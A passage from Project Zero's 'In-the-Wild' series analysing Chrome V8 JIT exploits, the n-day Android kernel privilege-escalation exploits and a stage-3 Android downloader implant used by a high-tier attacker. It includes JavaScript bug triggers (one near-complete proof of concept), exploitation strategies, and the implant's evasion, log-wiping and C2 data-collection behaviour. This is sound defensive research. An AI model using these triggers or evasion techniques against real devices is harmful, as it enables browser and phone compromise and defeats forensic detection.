The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive'' garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

jit_detector[Symbol.toPrimitive] = function() {

  var stack = (new Error).stack;

  if (stack.indexOf("Number (") == -1) {

    jit_detector.is_compiled = true;



function trigger(array, proxy) {

  if (!jit_detector.is_compiled) {




During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.

The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via or similar functions. Therefore, the trigger function had to be updated:

function trigger(new_target) {

  function inner(new_target) {

    popped = array.pop(

        Reflect.construct(function() { }, arguments, new_target));





By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.

3. CVE-2019-5782

The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

oob_index = 100000;


function trigger() {

  let array = [1.1, 1.1];


  let index = arguments.length;

  index = index - 65534;

  index = Math.max(index, 0);


  return array[index] = 2.2;



for (let i = 0; i < 20000; i++) {




print(trigger.apply(null, new Array(65534 + oob_index)));

Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.

The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known since at least 2017. The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

4. CVE-2019-13764

This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

for (var i = -Infinity; i < 0; i += Infinity) { [...] }

This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.


The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings  demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.

In-the-Wild Series: Android Exploits

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020


After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:

Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.


Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.


The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.

Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".


The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).


The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.


The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".


The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".


The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.


The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root". 
Baidu Security Lab: "KARMA shows you offense and defense".


Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively,  perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

In-the-Wild Series: Android Post-Exploitation

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020


This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation of the exploit chain. For this post, I will be calling different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, this stage, stage 3,  is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!


Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.

In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices. 

Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section. 

The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and points them to /dev/null. This will prevent output messages from appearing which may lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks.  It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.

The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.


Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a similar string obfuscation technique to stage 2. Another way that the binary obfuscates its behavior is that it uses a hash table to store dynamic configuration settings/status. Instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function.The binary encrypts its static configuration settings, communications with the C2, and a hash table that stores dynamic configuration setting with AES. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand the behavior of the device using dynamic analysis techniques. For example, it monitors what is mapped into the process’s memory, what file descriptors it has opened, and sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%

00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-

00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#

00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.

00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....

00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\

00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.

00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.

00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w

00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....

000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A

000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu

000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#

000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....

000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........

000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.

00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]

00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  [email protected]

00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..

00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as for status and configuration. The code initializes a CRC table which is used in the hashing algorithm and then the hash table is initialized. The structure that manages the hashtable shown below:

struct hashtable_mgr {

    int * hashtable_ptr;

    int maxEntries;

    int numEntries;


The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.

Each entry in the hashtable has the following structure.

struct hashtable_entry {

    BYTE * key_ptr;

    uint key_len;

    uint in_use;

    BYTE * value_ptr;

    uint value_len;


I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of. For example, the filename where to save stage 4 and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.


The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are less than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and static information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file too.

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

Environment Variable Name



Address of the decryption data block


Address of the function that will send logging messages to the C2 server


Address of the function that adds logging messages to the error and/or informational logging message queues


Points the the decrypted block of hashtable keys


Address of the function that performs inflate (decompress)


Address of the function that performs deflate (compress)

0x10 bytes at 0x228CC


0x10 bytes at 0x228DC

Pointer to the string representation of the hex_d_uuid

0x10 bytes at 0x228F0

Pointer to the C2 domain URL

0x10 bytes at 0x22904

Pointer to the port string for the C2 server

0x10 bytes at 0x22918

Pointer to the beginning of the certificate

0x10 bytes at 0x2292C


0x10 bytes at 0x22940

Pointer to +4AA in decrypted data block

0x10 bytes at 0x22954


0x10 bytes at 0x22698

Pointer to the user-agent string


Selinux status such as “selinux-init-read-fail” or “selinux-no-mdm”


Set if there is no “” string in /init


Set if the “” string is in /init

Error Handling & Logging

The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2”, adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.


This code is very diligent with trying to clean up its tracks, both while it's running and once it finishes. While it’s running, the binary forks a new process which runs code that is responsible for cleaning up logs while the other code is executing. This other process does the following to clean up stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0) which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlink all of the files in the following directories:
  • /data/tombstones
  • /data/misc/audit
  • /data/system/dropbox
  • /data/anr
  • /data/log
  • Unlinks the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will attempt 3 different addresses before it will bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”.  If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.

Handshake with the C2 Server

The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server.  Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties. They have 2 different ways to read system properties:

  • Call __system_property_get by doing dlopen(/system/lib/ and dlsym('__system_property_get').
  • Executing getprop in popen

